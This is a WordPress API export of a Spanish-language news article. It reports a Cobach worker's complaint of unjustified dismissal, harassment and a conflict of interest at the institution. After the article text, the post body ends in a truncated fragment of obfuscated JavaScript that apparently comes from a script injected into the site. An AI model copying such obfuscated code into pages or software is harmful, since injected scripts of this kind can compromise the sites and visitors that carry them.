{"id":20978,"date":"2025-03-20T02:43:17","date_gmt":"2025-03-20T02:43:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20978"},"modified":"2025-03-20T02:43:17","modified_gmt":"2025-03-20T02:43:17","slug":"denuncian-despido-injustificado-de-administrativa-del-cobach","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20978","title":{"rendered":"Denuncian despido injustificado de administrativa del Cobach"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"765\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0016-765x1024.jpg\" alt=\"\" class=\"wp-image-20979\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0016-765x1024.jpg 765w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0016-224x300.jpg 224w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0016-768x1027.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0016-1148x1536.jpg 1148w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0016.jpg 1196w\" sizes=\"auto, (max-width: 765px) 100vw, 765px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>19 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles Lorena Jim\u00e9nez Moreno, trabajadora del Colegio de Bachilleres de Chiapas (Cobach) con 15 a\u00f1os de servicio, denunci\u00f3 despido injustificado, acoso laboral y violaci\u00f3n sistem\u00e1tica de sus derechos por parte autoridades de esta instituci\u00f3n.<\/p>\n\n\n\n<p>Record\u00f3 que ocupaba el puesto de oficina en el Departamento de Formaci\u00f3n y Segimiento Acad\u00e9mico, solicit\u00f3 una licencia sin goce de sueldo del 15 de septiembre de 2024 al 31 de enero de 2025, amparada en la Cl\u00e1usula 58 del contrato colectivo del Sindicato de Trabajadores del Cobach.<\/p>\n\n\n\n<p>El 8 de enero de 2025, cumpliendo con el plazo de 8 d\u00edas estipulado, solicit\u00f3 su reincorporaci\u00f3n. Sin embargo, al presentarse el 4 de febrero, descubri\u00f3 que no estaba en n\u00f3mina ni pod\u00eda acceder a su checador electr\u00f3nico, pese a seguir contratada.<\/p>\n\n\n\n<p>Por ello pidi\u00f3 explicaciones a Recursos Humanos y al \u00e1rea jur\u00eddica, pero solo recibi\u00f3 evasivas y respuesta, present\u00f3 oficios para regularizar su situaci\u00f3n, pero las autoridades le informaron que hab\u00eda un \u201cdetallito\u201d en su expediente.<\/p>\n\n\n\n<p>Fue el 13 de marzo, le notificaron su despido bajo el argumento de \u201cfalta de honradez\u201d, acus\u00e1ndola de laborar simult\u00e1neamente en otra instituci\u00f3n educativa entre el 1 y el 15 de septiembre de 2024.<\/p>\n\n\n\n<p>La hoy ex trabajadora expuso con documentos que demuestran que su horario en Cobach (8:00 a 15:00 horas) no coincid\u00eda con su segundo empleo (15:30 a 22:30 horas). Adem\u00e1s, se\u00f1al\u00f3 inconsistencias en el proceso.<\/p>\n\n\n\n<p>\u201cArmaron un expediente para justificar mi salida. Incluso difamaron mis documentos y los de la otra instituci\u00f3n, llam\u00e1ndolos falsos\u201d, denunci\u00f3.<\/p>\n\n\n\n<p>El subdirector jur\u00eddico, Jos\u00e9 del Carmen, quien la interrog\u00f3, enfrenta un conflicto de intereses al representar legalmente a un sindicato Cobach, seg\u00fan su curr\u00edculum.<\/p>\n\n\n\n<p>Es por ello que hizo un llamado a las autoridades competentes y al gobernador del estado a atender este caso y no se cometa m\u00e1s injusticias.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 19 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles Lorena Jim\u00e9nez Moreno, trabajadora del Colegio de Bachilleres de Chiapas (Cobach) con 15 a\u00f1os de servicio, denunci\u00f3 despido injustificado, acoso laboral y violaci\u00f3n sistem\u00e1tica de sus derechos por parte autoridades de esta instituci\u00f3n. Record\u00f3 que ocupaba el puesto de oficina en el Departamento de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20979,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20978","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20978","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20978"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20978\/revisions"}],"predecessor-version":[{"id":20980,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20978\/revisions\/20980"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20979"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20978"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20978"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20978"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}